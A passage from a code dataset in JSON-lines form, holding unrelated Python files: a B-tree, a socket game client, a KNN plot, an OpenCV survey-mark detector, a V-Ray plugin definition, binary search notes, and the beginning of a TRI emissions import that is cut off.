else:\r\n for i in range(len(node.children)):\r\n if node.children[i] is not None:\r\n count += self.size(node.children[i])\r\n\r\n #count is returned\r\n return count\r\n \r\n #Function to print tree\r\n def printTree(self):\r\n if self.root is not None:\r\n self.root.traverse()\r\n print(\"The size of the b tree is\", self.size(self.root), \"nodes\")\r\n\r\n\r\n#Driver code\r\ntree = B_Tree()\r\ntree.insert(25)\r\ntree.insert(30)\r\ntree.insert(13)\r\ntree.insert(50)\r\ntree.insert(11)\r\ntree.insert(12)\r\ntree.insert(7)\r\ntree.insert(2048)\r\n\r\nprint(\"Tree after populating:\")\r\ntree.printTree()\r\nprint(\"___________________________________________\" + \"\\n\")\r\nprint(\"Tree after deleting 50\")\r\ntree.delete(50)\r\ntree.printTree()\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n","sub_path":"btree.py","file_name":"btree.py","file_ext":"py","file_size_in_byte":10765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177645745","text":"import sys\r\nimport os\r\nimport socket\r\n\r\nif __name__ == \"__main__\":\r\n HOST = input('Digite o endereço do Servidor:')\r\n PORT = input('Digite a porta do Servidor:')\r\n BUFSIZ = 4096\r\n ADDR = (HOST,int(PORT))\r\n\r\n \r\n\r\n\r\n nome = input(\"digite seu nome\\n\")\r\n opt = \" \"\r\n os.system(\"clear\")\r\n while(opt != \"SAIR\"):\r\n opt = input(\"[RANKING]\\n[JOGAR]\\n[SAIR]\\n\")\r\n if(opt.upper() == \"JOGAR\"):\r\n opt=\"\"\r\n os.system(\"clear\")\r\n while(opt == \"\"):\r\n \r\n opt=input(\"[ENTER]-jogar\\n[Tecla+ENTER] - sair\\n\")\r\n if(opt != \"\"):\r\n break\r\n os.system(\"clear\")\r\n client_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n client_sock.connect(ADDR)\r\n dados = \"nome:{}\".format(nome)\r\n client_sock.send(dados.encode('utf-8'))\r\n resposta = client_sock.recv(BUFSIZ)\r\n resposta = resposta.decode('utf-8')\r\n print(resposta)\r\n client_sock.close()\r\n \r\n \r\n\r\n elif(opt.upper()==\"SAIR\"):\r\n os.system(\"clear\")\r\n sys.exit()\r\n elif(opt.upper() == \"RANKING\"):\r\n os.system(\"clear\")\r\n\r\n client_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n client_sock.connect(ADDR)\r\n dados = \"ranking\".encode('utf-8')\r\n client_sock.send(dados)\r\n resposta = client_sock.recv(BUFSIZ)\r\n resposta = resposta.decode('utf-8')\r\n 
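            # NOTE: a single recv(BUFSIZ) is not guaranteed to return the whole
            # response; TCP is a byte stream, so a long ranking may arrive split
            # across several segments. Looping on recv() until it returns b''
            # (server closed the connection) would be the robust pattern here.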
print(resposta)\r\n            client_sock.close()\r\n\r\n            \r\n","sub_path":"cliente/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"564386747","text":"from operator import itemgetter\n\nuser = [\n\t{\"fname\" : \"Priyadharshan\", \"lname\" : \"Ravi\"},\n\t{\"fname\" : \"Vijay\", \"lname\" : \"Kuber\"},\n\t{\"fname\" : \"Dinesh\", \"lname\" : \"Sankaran\"},\n\t{\"fname\" : \"Harsha\", \"lname\" : \"Gunaseelan\"},\n\t{\"fname\" : \"Archana\", \"lname\" : \"Surulichamy\"},\n\t{\"fname\" : \"Saravanan\", \"lname\" : \"Ravi\"},\n\t{\"fname\" : \"Archana\", \"lname\" : \"Subramanyam\"}\n]\n\nfor x in sorted(user, key = itemgetter('fname')):\n\tprint(x)\n\nprint(\"_________________________\\n\")\n\nfor x in sorted(user, key = itemgetter(\"fname\", \"lname\")):\n\tprint(x)\t","sub_path":"heap/dict_multi_keysort.py","file_name":"dict_multi_keysort.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"278384318","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import style, cm\nfrom classes.KNN import KNN\nfrom matplotlib.colors import ListedColormap\nimport matplotlib.patches as mpatches\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n# Preparing learning data set.\ndf = pd.read_csv('data.txt', header=None)\ny = df.iloc[0:100, 4].values\ny = np.where(y == 'Iris-setosa', -1, 1)\nX = df.iloc[0:100, [0,2]].values\n\n# Preparing classifier class\nknn = KNN(k=13).fit(X, y)\n\n# Initializing charts surface\nstyle.use('fivethirtyeight')\nfig, ax = plt.subplots(nrows=1, ncols=2, figsize=(8,4))\n\n# Rendering decision regions chart\nresolution=0.01\nmarkers = ('o', 'x')\ncmap = ListedColormap(['red', 'blue'])\n\nx1_min, x1_max = X[:, 0].min() -1, X[:, 0].max() + 1\nx2_min, x2_max = X[:, 1].min() -1, X[:, 1].max() + 1\nxx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\\\n                       np.arange(x2_min, x2_max, resolution))\n\nZ = knn.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\nZ = Z.reshape(xx1.shape)\n\nax[0].contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\nax[0].set_xlim(xx1.min(), xx1.max())\nax[0].set_ylim(xx2.min(), xx2.max())\n\nfor idx, cl in enumerate(np.unique(y)):\n    ax[0].scatter(x=X[y == cl, 0], y=X[y == cl,1],\\\n               alpha=0.8, c=cmap(idx),\\\n               marker=markers[idx],\\\n               label= np.where(cl == 1, 'Versicolor', 'Setosa'))\n\nax[0].set_xlabel('Sepal length [cm]')\nax[0].set_ylabel('Petal length [cm]')\nax[0].legend(loc='upper left')\nax[0].set_title('Decision regions')\n\n# Rendering prediction confidence\nAC = knn.confidence(np.array([xx1.ravel(), xx2.ravel()]).T)\nAC = AC.reshape(xx1.shape)\n\nct = ax[1].contourf(xx1, xx2, AC, 50, cmap=cm.RdYlGn)\nax[1].set_xlim(xx1.min(), xx1.max())\nax[1].set_ylim(xx2.min(), xx2.max())\nax[1].set_xlabel('Sepal length [cm]')\nax[1].set_ylabel('Petal length [cm]')\nax[1].set_title('Prediction confidence')\n\ndivider = make_axes_locatable(ax[1])\ncax = divider.append_axes('right', size='5%', pad=0.05)\nclb = fig.colorbar(ct, cax=cax, orientation='vertical')\nclb.ax.set_title('%')\n\nplt.show()\n\n","sub_path":"classification/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"17492396","text":"\n\nfrom xai.brain.wordbase.adjectives._imperfect import _IMPERFECT\n\n#class 
header\nclass _IMPERFECTS(_IMPERFECT, ):\n\tdef __init__(self,): \n\t\t_IMPERFECT.__init__(self)\n\t\tself.name = \"IMPERFECTS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"imperfect\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_imperfects.py","file_name":"_imperfects.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534699332","text":"from OpenGL.GL import *\nfrom wx import glcanvas\nfrom wx import *\n\nclass GLSubWindow(Frame):\n def __init__(self, parent, title, gllock, size = DefaultSize):\n super(GLSubWindow, self).__init__(parent, size = size)\n\n # OpenGL mutex lock\n self.gllock = gllock\n\n # OpenGL canvas\n self.canvas = glcanvas.GLCanvas(self, attribList = (\n glcanvas.WX_GL_RGBA,\n glcanvas.WX_GL_DOUBLEBUFFER,\n glcanvas.WX_GL_DEPTH_SIZE,\n 0\n ), size = size)\n # No GL context for now. Must be created after window is shown\n self.context = None\n\n # Binds\n # Close bypass\n self.Bind(EVT_CLOSE, self.onClose)\n # GL canvas binds\n self.canvas.Bind(EVT_PAINT, self.onPaint)\n self.canvas.Bind(EVT_SIZE, self.onResize)\n\n # Set title\n self.SetTitle(title)\n\n # Set minimum size\n self.SetMinSize(self.GetSize())\n\n # Save size\n self.canvasSize = self.canvas.GetClientSize()\n\n def makeContext(self):\n self.context = glcanvas.GLContext(self.canvas)\n\n def onClose(self, event):\n # Don't close the GL window, just hide it instead. The parent window\n # does the cleanup, not this, so this instance is only destroyed when\n # the parent window is destroyed. This is done automatically\n self.Hide()\n\n def onPaint(self, event):\n #self.gllock.acquire()\n # Tell wxPython that we are drawing while processing this event\n PaintDC(self.canvas)\n # Use the viewer's GL context\n self.canvas.SetCurrent(self.context)\n # Redraw canvas. This must be defined by the daughter class\n self.redrawCanvas()\n # Swap buffers to display\n glFinish()\n self.canvas.SwapBuffers()\n #self.gllock.release()\n # Run default handler aswell\n event.Skip()\n\n def onResize(self, event):\n CallAfter(self.doResizeEvent)\n # Run default handler aswell\n event.Skip()\n\n def doResizeEvent(self):\n # Get new memory viewer size\n self.canvasSize = self.canvas.GetClientSize()\n # Use the viewer's GL context\n #self.gllock.acquire()\n self.canvas.SetCurrent(self.context)\n # Use new size and update orthographic projection\n self.updateOrtho()\n # Resize canvas. 
This must be defined by the daughter class\n self.resizeCanvas()\n glFinish()\n #self.gllock.release()\n\n def updateOrtho(self):\n # Use orthographic projection\n glViewport(0, 0, self.canvasSize.width, self.canvasSize.height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(0, self.canvasSize.width, self.canvasSize.height, 0, -1, 1)\n glMatrixMode(GL_MODELVIEW)\n\n def redrawCanvas(self):\n raise NotImplementedError\n\n def resizeCanvas(self):\n raise NotImplementedError\n","sub_path":"glsubwindow.py","file_name":"glsubwindow.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"9342074","text":"def binary_search(elements, item):\n low = 0\n high = len(elements) - 1\n\n while low <= high:\n mid = int((low + high) / 2)\n guess = elements[mid]\n\n if guess == item:\n return mid\n if guess > item:\n high = mid - 1\n else:\n low = mid + 1\n\n return None\n\n\nelements = list(range(1, 101))\n\nprint(binary_search(elements, 505))\n\n# EXERCISES\n\n# 1.1 Suppose you have a sorted list of 128 names, and you’re searching through it using binary search.\n# What’s the maximum number of steps it would take?\n\n# ANSWER: log128 = 7, because 2^7 = 128\n\n# 1.2 Suppose you double the size of the list.\n# What’s the maximum number of steps now?\n\n# ANSWER: log256 = 8, because 2^8 = 256\n\n# Give the run time for each of these scenarios in terms of Big O.\n# 1.3 You have a name, and you want to find the person’s phone number in the phone book.\n# ANSWER: O(log n)\n\n# 1.4 You have a phone number, and you want to find the person’s name in the phone book.\n# (Hint: You’ll have to search through the whole book!)\n# ANSWER: O(n)\n\n# 1.5 You want to read the numbers of every person in the phone book.\n# ANSWER: O(n)\n\n# 1.6 You want to read the numbers of just the As.\n# (This is a tricky one! It involves concepts that are covered more in chapter 4.\n# Read the answer—you may be surprised!)\n# ANSWER: Don't know this yet.\n\n\n# Theory time\n\n# If a list has 1000 elements it would take 1000 guesses to find an element in worst case.\n# So whenever we have number of maximum guesses and the size of array equal we call that LINEAR TIME. O(n)\n\n# Binary search is different because it runs in LOGARITHMIC TIME, which means for an array that has 100\n# elements maximum number of guesses in the worst case is 7. 
O(log n)\n\n# Big O is the special notation that tells us how fast an algorithm is.\n\n# O(n) - n stands for number of operations.\n\n\n\n\n\n","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"551455175","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 23 21:34:10 2018\r\n\r\n@author: kSwoboda\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport math\r\n#import multiprocessing\r\n\r\ndef CaptureFrame (name):\r\n V_list = []\r\n IsCaptured = 0\r\n \r\n #Choosing source of input\r\n \r\n #cap = cv2.VideoCapture(0)\r\n \r\n cap = cv2.VideoCapture(name); \r\n i = -1\r\n lista =[]\r\n while(True):\r\n czekaj = 0 \r\n\r\n i=i+1\r\n # skoro chcecie kazda ramke\r\n # if not(i % 5): \r\n ret, frame = cap.read()\r\n if ret == 1 :\r\n \r\n #Converting image to HSV\r\n frame_HSV = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n V = np.mean(frame_HSV[:,:,2])\r\n\r\n #Aggregating V-values\r\n V_list.append(V)\r\n if IsCaptured == 0 and V>90 and i>10 and np.sum(np.square(V - V_list[-10:-2]))<1:\r\n while(czekaj<10):\r\n ret, frame = cap.read()\r\n czekaj = czekaj +1\r\n lista.append(frame)\r\n V_list.clear\r\n IsCaptured = 1\r\n if IsCaptured == 1 and V < 10:\r\n IsCaptured = 0\r\n else:\r\n break\r\n \r\n #plt.plot(V_list)\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n return lista\r\n\r\n#Ta funkcja dostaje ramkę i progi \r\ndef fixture (img, low, up):\r\n I=img\r\n imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n ret,thresh = cv2.threshold(imgray,low,up,0)\r\n kernel = np.ones((9,9),np.uint8)\r\n img_open = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\r\n img_close = cv2.morphologyEx(img_open, cv2.MORPH_CLOSE, kernel)\r\n im2, contours, hierarchy = cv2.findContours(img_close,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n areat = 0\r\n for i in range (0,len(contours)): \r\n area = cv2.contourArea(contours[i])\r\n if(area> areat):\r\n areat = area\r\n cnt = contours[i]\r\n \r\n rect = cv2.minAreaRect(cnt)\r\n box = cv2.boxPoints(rect)\r\n box = np.int0(box)\r\n cv2.drawContours(I,[box],0,(0,0,255),2)\r\n\r\n #Tu licze kat o jaki to jest przesuniete , ale dosyc chujowo , trzeba to sprawdzic\r\n x =( box[ 0, 0] - box [1, 0])/(box[0,1]-box[1,1])\r\n kat = math.atan(x)\r\n kat = kat* 57.29577951308\r\n \r\n rows = I.shape[0]\r\n cols = I.shape[1]\r\n M = cv2.getRotationMatrix2D((cols/2,rows/2),-kat,1)\r\n I = cv2.warpAffine(I,M,(cols,rows))\r\n\r\n X= (box[ 0, 0] + box [1, 0])/2\r\n Y= (box[1,1]+box[2,1])/2\r\n X2= (box[2,0]+box[3,0])/2 \r\n Y2= (box[0,1]+box[3,1])/2\r\n\r\n newim = np.zeros([ np.int(Y2-Y), np.int(X2-X),3])\r\n\r\n for i in range(0, np.int(Y2-Y)):\r\n for j in range(0, np.int(X2-X)):\r\n if(i<10 or j<10 or j>X2-X-10 or i>Y2-Y-10):\r\n newim[i,j] = 255\r\n else:\r\n newim[i,j]=I[i+np.int(Y),j+np.int(X)]\r\n \r\n return newim\r\n\r\n# tu dodatkowo wejdzie : template i to trzeba dopisać , ale na razie sam się liczy \r\ndef find_templates (img_gray, edge_min, edge_max, template_treshold): # tu dodatkowo wejdzie : template\r\n# przykładowe parametry: edge_min = 100 , edge_max = 200, template_treshold = 0,5\r\n# funkcja zwraca unikatową listę wykryć wzoru \r\n\r\n edges = cv2.Canny(img_gray,edge_min,edge_max)\r\n img_gray = np.uint8(edges)\r\n\r\n# tu jest liczony wycinek dodetekcji, nie będzie to robione tu, tylko ze wzoru( TO DO)\r\n template = np.zeros([ 14, 14])\r\n for i 
in range(287, 301):\r\n for j in range(124, 138):\r\n template[i-287,j-124] = edges[i][j]\r\n template = np.uint8(template)\r\n#koniec tej częsci, którą trzeba kiedy zmienić\r\n w, h = template.shape[::-1]\r\n \r\n#Znajduje template w obrazie:\r\n res = cv2.matchTemplate(img_gray,template,cv2.TM_CCOEFF_NORMED)\r\n\r\n# Od tego momentu nastąpi kilka dziwnych operacji, ponieważ te template się czasem dublują \r\n loc_repeat = np.where( res >= template_treshold)\r\n loc_trans = []\r\n for i in range (0, len(loc_repeat[1])):\r\n loc_trans.append((loc_repeat[0][i],loc_repeat[1][i],(loc_repeat[0][i]+loc_repeat[1][i])))\r\n\r\n from operator import itemgetter\r\n loc_repeat=sorted(loc_trans,key=itemgetter(2))\r\n\r\n loc = []\r\n loc.append([loc_repeat[0][0],loc_repeat[0][1]])\r\n for i in range (1, len(loc_repeat)):\r\n dist = np.abs(loc_repeat[i][1] - loc_repeat[i-1][1]) + np.abs(loc_repeat[i][0] - loc_repeat[i-1][0])\r\n if(dist>10):\r\n loc.append([loc_repeat[i][0],loc_repeat[i][1]])\r\n#loc zawiera już unikatowe template\r\n return loc\r\n\r\ndef find_contours_in_templates (loc,img, template_width, template_height, tresh_lowerB, tresh_upperB, cont_min, cont_max):\r\n# przykładowe parametry: template_ width = 14, template_height = 14, tresh_upperB = 255, tresh_lowerB = 30, cont_min = 40, cont_max = 80\r\n#poza tym , że funkcja przyjmuje w pizdu parametrów, to zwraca liste konturów, które nas obchodzą\r\n \r\n \r\n#preprocessing obrazu\r\n img = cv2.cvtColor(np.uint8(img), cv2.COLOR_BGR2GRAY)\r\n cv2.equalizeHist( img, img );\r\n ret,img = cv2.threshold(img,tresh_lowerB,tresh_upperB,0)\r\n kernel = np.ones((1,1),np.uint8)\r\n img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\r\n \r\n im2, contours, hierarchy = cv2.findContours(img,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n#wybranie odpowiedniej wielkosci konturow\r\n cnt = []\r\n for i in range (0,len(contours)): \r\n area = cv2.contourArea(contours[i])\r\n if((area> cont_min) & (area= loc[i][1]) & (cnt_sorted[c][0][0][0]<= (loc[i][1] +template_width)) & (cnt_sorted[c][0][0][1]>= loc[i][0]) & (cnt_sorted[c][0][0][1]<= (loc[i][0] +template_height))))\r\n if(war):\r\n cnt_ok.append(cnt_sorted[c])\r\n break\r\n \r\n return cnt_ok\r\n\r\ndef find_marks (img_gray, loc, cnt_ok,template_width, template_height, brightness_tresh):\r\n#przykładowe parametry: template_width = 14, template_height =14, brightness_tresh =120\r\n#funkcja zwraca listę punktów z wynikiem i jasnoscią\r\n \r\n#tworzę maskę obrazu z zaznaczonymi polami\r\n mask = np.zeros([ img_gray.shape[0], img_gray.shape[1]]) \r\n mask = np.uint8(mask)\r\n mask= cv2.cvtColor(mask, cv2.COLOR_GRAY2BGR) \r\n cv2.drawContours(mask, cnt_ok, -1, (255,255,255), -1)\r\n mask= cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY) \r\n\r\n wypelnienie = []\r\n for i in range (0, len(loc)):\r\n jasnosc = 0\r\n out = 0 \r\n n = 0\r\n for j in range (loc[i][0],loc[i][0]+ template_width):\r\n for k in range (loc[i][1],loc[i][1]+ template_height):\r\n if(mask[j,k] > 1):\r\n jasnosc = jasnosc + img_gray[j,k]\r\n n= n+1\r\n if(n!=0):\r\n jasnosc = jasnosc /n\r\n if ( jasnosc < brightness_tresh):\r\n out = 1\r\n wypelnienie.append([out, jasnosc,[loc[i][0],loc[i][1]]])\r\n \r\n return wypelnienie\r\n\r\n\r\n#ta funkcja wywołuje reszte, okre \r\ndef funkcja_test(nazwa):\r\n I=CaptureFrame(nazwa)\r\n I=I[0]\r\n img = fixture (I, 20, 255)\r\n cv2.imshow(\"Wycieta ankieta\", np.uint8(img))\r\n img_gray = cv2.cvtColor(np.uint8(img), cv2.COLOR_BGR2GRAY)\r\n \r\n #wielkosc wycinka\r\n w = 14\r\n h = 14\r\n \r\n loc = []\r\n loc 
= find_templates (img_gray, 100, 200, 0.5)\r\n cnt = []\r\n cnt = find_contours_in_templates (loc,img, w,h, 30, 255, 40, 80)\r\n wynik = []\r\n wynik = find_marks (img_gray, loc, cnt, w,h, 120)\r\n for i in range (0, len(loc)):\r\n pt = (loc[i][1], loc[i][0])\r\n \r\n if(wynik[i][0]):\r\n cv2.rectangle(img, pt, (pt[0] + w, pt[1] + h), (0,255,0), 1)\r\n else:\r\n cv2.rectangle(img, pt, (pt[0] + w, pt[1] + h), (0,0,255), 1)\r\n \r\n cv2.drawContours(img, cnt, -1, (255,255,255), 1)\r\n cv2.imshow('wynik',np.uint8(img))\r\n cv2.waitKey(10)\r\n \r\n\r\n#wywolanie funkcji:\r\nfunkcja_test(\"C:\\\\Users\\kSwoboda\\\\Desktop\\\\ankieter\\\\Pollster-master\\\\ICK_ankieter\\\\ankieta_OK.avi\")\r\n\r\n \r\n ","sub_path":"kswoboda_wykrywanie zaznaczen.py","file_name":"kswoboda_wykrywanie zaznaczen.py","file_ext":"py","file_size_in_byte":8306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"539414107","text":"#\n# V-Ray For Blender\n#\n# http://chaosgroup.com\n#\n# Author: Andrei Izrantcev\n# E-Mail: andrei.izrantcev@chaosgroup.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n# All Rights Reserved. V-Ray(R) is a registered trademark of Chaos Software.\n#\n\nimport bpy\n\nfrom vb30.lib import ExportUtils\n\n\nTYPE = 'BRDF'\nID = 'BRDFLight'\nNAME = 'Light'\nDESC = \"\"\n\nPluginParams = (\n {\n 'attr' : 'color',\n 'desc' : \"The self-illumination color\",\n 'type' : 'TEXTURE',\n 'default' : (1.0, 1.0, 1.0),\n },\n {\n 'attr' : 'colorMultiplier',\n 'desc' : \"Color Multiplier\",\n 'type' : 'FLOAT_TEXTURE',\n 'default' : 1,\n },\n {\n 'attr' : 'transparency',\n 'desc' : \"Transparency of the BRDF\",\n 'type' : 'TEXTURE',\n 'default' : (0.0, 0.0, 0.0),\n },\n {\n 'attr' : 'doubleSided',\n 'desc' : \"If false, the light color is black for back-facing surfaces\",\n 'type' : 'BOOL',\n 'default' : False,\n },\n {\n 'attr' : 'emitOnBackSide',\n 'desc' : \"Emit on back side\",\n 'type' : 'BOOL',\n 'default' : True,\n },\n {\n 'attr' : 'channels',\n 'desc' : \"Render channels the result of this BRDF will be written to\",\n 'type' : 'PLUGIN',\n 'default' : \"\",\n },\n {\n 'attr' : 'compensateExposure',\n 'desc' : \"Compensate camera exposure\",\n 'type' : 'BOOL',\n 'default' : False,\n },\n {\n 'attr' : 'multiplyByOpacity',\n 'desc' : \"When enabled the color of the light brdf is multiplied by the brdf's opacity (inverse of the brdf's transparency)\",\n 'type' : 'BOOL',\n 'default' : False,\n },\n)\n\nPluginWidget = \"\"\"\n{ \"widgets\": [\n { \"layout\" : \"SPLIT\",\n \"splits\" : [\n { \"layout\" : \"COLUMN\",\n \"attrs\" : [\n { \"name\" : \"doubleSided\" },\n { \"name\" : \"emitOnBackSide\" }\n ]\n },\n { \"layout\" : \"COLUMN\",\n \"attrs\" : [\n { \"name\" : \"compensateExposure\" },\n { \"name\" : \"multiplyByOpacity\" }\n ]\n }\n ]\n 
}\n]}\n\"\"\"\n","sub_path":"plugins/brdf/BRDFLight.py","file_name":"BRDFLight.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"621203047","text":"import sys\nfrom time import time\n\nclass TimeIt(object):\n def __init__(self, msg, silent=False):\n self._msg = msg\n self._start = None\n self._silent = silent\n\n def __enter__(self):\n if self._silent:\n return\n self._start = time()\n sys.stdout.write(self._msg)\n sys.stdout.flush()\n\n def __exit__(self, *args):\n if self._silent:\n return\n elapsed = time() - self._start\n print(' done (%.2f s)' % (elapsed,))\n sys.stdout.flush()\n","sub_path":"pandas_plink/_timeit.py","file_name":"_timeit.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"209932826","text":"from collections import defaultdict\nfrom pprint import pprint\nimport argparse\n\nFR = 1.0\nHR = 0.5\n\n\ndef _incrementator(line, resultdict, tower_id, use_type):\n '''helper function to fill result dict'''\n if \"FR\" in line:\n resultdict[tower_id][use_type] += FR\n return\n elif \"HR\" in line:\n resultdict[tower_id][use_type] += HR\n return\n else:\n return\n\n\ndef main_parser(logfile):\n '''main function to parse log file and show result'''\n result = defaultdict(lambda: {'SPEECH': 0.0, 'GPRS': 0.0, 'IDLE': 0.0})\n for line in logfile:\n if \"QUEUED\" in line and \"CELL\" in line:\n tower_id = logfile.next().split(\" \")[0] # find tower id\n\n if \"SPEECH\" in line and \"BUSY\" in line:\n _incrementator(line, result, tower_id, \"SPEECH\")\n\n if \"GPRS\" in line and \"BUSY\" in line and (\"NONE\" in line or \"EGPRS\" in line):\n _incrementator(line, result, tower_id, \"GPRS\")\n\n if \"IDLE\" in line and not \"NONE\" in line:\n _incrementator(line, result, tower_id, \"IDLE\")\n pprint(dict(result))\n logfile.close()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n prog='CELL RESOURCES PARSER',\n )\n parser.add_argument('--f', type=argparse.FileType('r'), default=\"UsageBuffer.txt\")\n args = parser.parse_args()\n main_parser(args.f)\n","sub_path":"sparser.py","file_name":"sparser.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"470882585","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/8/1 11:11\nimport os\n\npath = os.path.abspath(os.path.dirname(os.getcwd()))\nimport sys\n\nsys.path.append(path)\nimport pymongo\n\n# 线上mongo\nMONGODB_URI = 'mongodb://192.168.8.130:27017'\n# MONGODB_NAME = \"doc\"\n# WORDS_NAME = 'Sougou_pdf_url_new'\n\ndb = pymongo.MongoClient(MONGODB_URI)\nsougou_url = db['sougou']['sougou_new_links']\n\nMONGODB_URI_two = 'mongodb://192.168.8.211:27017'\ndb_two = pymongo.MongoClient(MONGODB_URI_two)\ncon_proxy = db_two['proxy']\ncon_proxy_dongtai = db_two['proxy']['proxies_ip_dongtai']\nli_db_words = db_two['springer_meta_20180809']['keywords_cn']\nli_db_words_en = db_two['springer_meta_20180809']['keywords_en']\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"15507781","text":"# Este script se invoca de forma remota para lanzar despliegues de la aplicación de Voting App\n# La invocación se debe realizar de la siguiente forma:\n# cd /opt/xebialabs/xl-deploy-9.0.5-cli/bin/\n# ./cli.sh -f 
/home/jcla/Projects/xld-scripts/voting-app-k8s/undeployXLDVotingAppK8s.py\n# El usuario y la password están en el fichero /opt/xebialabs/xl-deploy-X-cli/conf/deployit.conf con el siguiente contenido\n# cli.username=admin\n# cli.password=password <- la password se modifica la primera vez que ejecutemos el cli\n\ndef undeployVotingApp(environment):\n taskID = deployment.createUndeployTask(\"Environments/application-voting-app-k8s/application-voting-app-k8s-{0}/application-voting-app-k8s-{0}/deployment-vote\".format(environment)).id\n print(\"taskId = {0}\".format(taskID))\n deployit.startTaskAndWait(taskID)\n\nfor e in ['dev', 'pre', 'pro']:\n undeployVotingApp(e)\n\n","sub_path":"voting-app-k8s/undeployXLDVotingAppK8s.py","file_name":"undeployXLDVotingAppK8s.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"110659558","text":"#!/usr/bin/env python\n\n# TRI import and processing\n# This script uses the TRI Basic Plus National Data File.\n# Data files:https://www.epa.gov/toxics-release-inventory-tri-program/tri-basic-plus-data-files-calendar-years-1987-2016\n# Documentation on file format: https://www.epa.gov/toxics-release-inventory-tri-program/tri-basic-plus-data-files-guides\n\nimport pandas as pd\nimport numpy as np\nimport time\nimport os.path\nfrom stewi.globals import unit_convert,set_dir,output_dir,data_dir,reliability_table,inventory_metadata,\\\n validate_inventory,write_validation_result,write_metadata,url_is_alive,get_relpath,lb_kg,g_kg\n\nimport logging\n\n# Set some metadata\nTRIyear = '2016'\ntri_metadata = inventory_metadata\ntri_url = 'https://www3.epa.gov/tri/current/US_' + TRIyear + '_v'\n\n\ndef get_current_version():\n version = 15# Most recent version of TRI Basic Plus as of writing this is v15\n while url_is_alive(tri_url + str(int(version + 1)) + '.zip'): version += 1\n return str(version)\n\n\n# Import list of fields from TRI that are desired for LCI\ndef imp_fields(tri_fields_txt):\n tri_required_fields_csv = tri_fields_txt\n tri_req_fields = pd.read_table(tri_required_fields_csv, header=None)\n tri_req_fields = list(tri_req_fields[0])\n return tri_req_fields\n\n\ntri_version = get_current_version()\ntri_url += tri_metadata['SourceVersion'] + '.zip'\ntri_required_fields = (imp_fields(data_dir + 'TRI_required_fields.txt'))\n\n\n# Import in pieces grabbing main fields plus unique amount and basis of estimate fields\n# assigns fields to variables\ndef concat_req_field(list):\n source_name = ['TRIFID','CHEMICAL NAME', 'CAS NUMBER','UNIT OF MEASURE'] + list\n return source_name\n\n\nfacility_fields = ['FACILITY NAME','FACILITY STREET','FACILITY CITY','FACILITY COUNTY','FACILITY STATE',\n 'FACILITY ZIP CODE','PRIMARY NAICS CODE','LATITUDE','LONGITUDE']\n\nfug_fields = ['TOTAL FUGITIVE AIR EMISSIONS','FUGITIVE OR NON-POINT AIR EMISSIONS - BASIS OF ESTIMATE']\nstack_fields = ['TOTAL STACK AIR EMISSIONS','STACK OR POINT AIR EMISSIONS - BASIS OF 